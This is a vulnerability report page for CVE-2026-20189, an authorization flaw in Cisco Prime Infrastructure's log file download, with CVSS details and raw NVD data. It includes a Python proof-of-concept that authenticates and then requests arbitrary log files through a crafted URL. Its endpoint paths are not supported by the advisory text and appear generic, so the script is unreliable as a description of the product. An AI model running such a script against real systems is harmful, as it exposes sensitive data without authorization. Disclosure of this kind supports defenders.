Security Vulnerability Report
CVE-2026-20189 CVSS 4.3 MEDIUM

CVE-2026-20189

Published: 2026-05-06 17:16:21
Last Modified: 2026-05-06 18:59:53

Description

A vulnerability in the log file download functionality of Cisco Prime Infrastructure could allow an authenticated, remote attacker to download arbitrary log files from the server. This vulnerability is due to insufficient authorization checks on the download service API. An attacker could exploit this vulnerability by submitting a crafted URL request to an affected device. A successful exploit could allow the attacker to download sensitive log files that they would otherwise not have authorization to access. To exploit this vulnerability, the attacker must have valid credentials to access the web-based management interface of the affected device.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Prime Infrastructure (for the specific affected versions, refer to Cisco's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

def exploit(target, username, password, log_path):
    session = requests.Session()

    # Step 1: Authenticate (Valid credentials required)
    login_data = {'username': username, 'password': password}
    session.post(f"{target}/webui/login", data=login_data, verify=False)

    # Step 2: Exploit Authorization Bypass
    # Craft URL to download arbitrary log file
    exploit_url = f"{target}/webui/api/log/download?file={log_path}"
    response = session.get(exploit_url, verify=False)

    if response.status_code == 200:
        print(f"[+] Success! Log content length: {len(response.text)}")
        return response.text
    else:
        print("[-] Exploit failed")
        return None

# Usage
# exploit("https://target-ip", "attacker", "pass", "/var/log/syslog")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20189", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.360", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the log file download functionality of Cisco Prime Infrastructure could allow an authenticated, remote attacker to download arbitrary log files from the server.\r\n\r\nThis vulnerability is due to insufficient authorization checks on the download service API. An attacker could exploit this vulnerability by submitting a crafted URL request to an affected device. A successful exploit could allow the attacker to download sensitive log files that they would otherwise not have authorization to access.\r\nTo exploit this vulnerability, the attacker must have valid credentials to access the web-based management interface of the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-unauth-infodiscl-LFnLgmey", "source": "[email protected]"}]}}